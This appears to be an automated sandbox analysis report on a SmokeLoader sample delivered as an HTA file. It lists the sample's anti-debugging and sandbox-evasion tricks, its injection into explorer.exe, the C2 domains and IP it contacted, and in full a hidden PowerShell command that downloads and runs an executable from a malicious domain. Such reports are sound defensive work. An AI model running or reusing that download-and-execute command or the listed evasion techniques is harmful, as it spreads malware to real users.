Source: C:\Users\user\AppData\Local\Temp\EkXH.exe API/Special instruction interceptor: Address: 7731BFFA
Source: C:\Users\user\AppData\Roaming\vgjfftu API/Special instruction interceptor: Address: 7731C7BA
Source: C:\Users\user\AppData\Roaming\vgjfftu API/Special instruction interceptor: Address: 7731BFFA
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1237 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2849 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 422 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2431 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2555 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 1579 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\mshta.exe TID: 3604 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3740 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3752 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3644 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 3884 Thread sleep count: 422 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3892 Thread sleep count: 2431 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3892 Thread sleep time: -243100s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 3888 Thread sleep count: 263 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4000 Thread sleep count: 249 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4008 Thread sleep count: 146 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 4004 Thread sleep count: 215 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1340 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 3892 Thread sleep count: 2555 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3892 Thread sleep time: -255500s >= -30000s Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 3980 Thread sleep time: -120000s >= -30000s Jump to behavior
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00418A70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418CA4h 4_2_00418A70
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_00418A70 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418CA4h 8_2_00418A70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000005.00000000.404961446.00000000001D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
Source: explorer.exe, 00000005.00000000.405739079.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000005.00000000.405739079.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000005.00000000.405739079.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
Source: explorer.exe, 00000005.00000000.405400637.00000000025E0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
Source: explorer.exe, 00000005.00000000.405739079.0000000003E59000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\vgjfftu System information queried: CodeIntegrityInformation Jump to behavior
Found API chain indicative of debugger detection
Source: C:\Users\user\AppData\Roaming\vgjfftu Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\vgjfftu Process queried: DebugPort Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_0022092B mov eax, dword ptr fs:[00000030h] 4_2_0022092B
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00220D90 mov eax, dword ptr fs:[00000030h] 4_2_00220D90
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_0066BBF4 push dword ptr fs:[00000030h] 4_2_0066BBF4
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_0022092B mov eax, dword ptr fs:[00000030h] 8_2_0022092B
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_00220D90 mov eax, dword ptr fs:[00000030h] 8_2_00220D90
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_0099B7D4 push dword ptr fs:[00000030h] 8_2_0099B7D4
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: vgjfftu.5.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: openclehardware.ru
Source: C:\Windows\explorer.exe Domain query: ceoconstractionstore.pl
Source: C:\Windows\explorer.exe Domain query: unicexpertmagazine.pw
Source: C:\Windows\explorer.exe Domain query: informcoopirationunicolceo.ru
Source: C:\Windows\explorer.exe Network Connect: 185.219.7.204 80 Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Thread created: C:\Windows\explorer.exe EIP: 28319F0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\vgjfftu Thread created: unknown EIP: 27019F0 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\vgjfftu Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\vgjfftu Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\EkXH.exe "C:\Users\user\AppData\Local\Temp\EkXH.exe" Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\vgjfftu C:\Users\user\AppData\Roaming\vgjfftu Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -command "$path = $env:temp + '\ekxh.exe'; $client = new-object system.net.webclient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); start-process -filepath $path"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -command "$path = $env:temp + '\ekxh.exe'; $client = new-object system.net.webclient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); start-process -filepath $path" Jump to behavior
Source: explorer.exe, 00000005.00000000.404961446.00000000001D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman-
Source: explorer.exe, 00000005.00000000.405126817.0000000000720000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.405126817.0000000000720000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.405126817.0000000000720000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: !Progman
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00418A70 InterlockedCompareExchange,GetFocus,ReadConsoleA,FindAtomA,SearchPathA,SetConsoleMode,SearchPathW,GetDefaultCommConfigA,CopyFileExW,CreatePipe,GetEnvironmentStringsW,WriteConsoleOutputA,GetModuleFileNameA,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmW,WaitForSingleObject,SetCommState,GetConsoleAliasesLengthW,GetComputerNameA,CopyFileW,GetFileAttributesA,GetConsoleAliasExesLengthW,GetBinaryType,FormatMessageA,GetLongPathNameA,PurgeComm,LoadLibraryA,MoveFileW,InterlockedCompareExchange, 4_2_00418A70
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000004.00000002.406593052.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.406582889.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.475270997.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.476491461.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000004.00000002.406593052.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.406582889.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.475270997.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.476491461.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1524029 Sample: 3388.PDF.hta Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 7 other signatures 2->48 8 mshta.exe 10 2->8         started        11 taskeng.exe 1 2->11         started        process3 signatures4 58 Suspicious powershell command line found 8->58 60 Tries to download and execute files (via powershell) 8->60 13 powershell.exe 12 7 8->13         started        18 vgjfftu 11->18         started        process5 dnsIp6 38 unicexpertmagazine.pw 185.219.7.204, 49161, 49162, 49163 IT-KMEIT Russian Federation 13->38 40 ukr-net-filesrever.pw 13->40 30 C:\Users\user\AppData\Local\TempkXH.exe, PE32 13->30 dropped 68 Powershell drops PE file 13->68 20 EkXH.exe 13->20         started        70 Antivirus detection for dropped file 18->70 72 Multi AV Scanner detection for dropped file 18->72 74 Detected unpacking (changes PE section rights) 18->74 76 8 other signatures 18->76 file7 signatures8 process9 signatures10 50 Antivirus detection for dropped file 20->50 52 Multi AV Scanner detection for dropped file 20->52 54 Detected unpacking (changes PE section rights) 20->54 56 8 other signatures 20->56 23 explorer.exe 1 1 20->23 injected process11 dnsIp12 32 unicexpertmagazine.pw 23->32 34 openclehardware.ru 23->34 36 2 other IPs or domains 23->36 28 C:\Users\user\AppData\Roaming\vgjfftu, PE32 23->28 dropped 62 System process connects to network (likely due to code injection or exploit) 23->62 64 Benign windows process drops PE files 23->64 66 Hides that the sample has been downloaded from the Internet (zone.identifier) 23->66 file13 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.219.7.204
 ukr-net-filesrever.pw Russian Federation
202514 IT-KMEIT true

Contacted Domains

Name IP Active
ukr-net-filesrever.pw 185.219.7.204 true
unicexpertmagazine.pw 185.219.7.204 true
openclehardware.ru unknown unknown
informcoopirationunicolceo.ru unknown unknown
ceoconstractionstore.pl unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://informcoopirationunicolceo.ru/index.php true unknown
http://openclehardware.ru/index.php true unknown
http://ukr-net-filesrever.pw/download/svc.exe true unknown
http://ceoconstractionstore.pl/index.php true unknown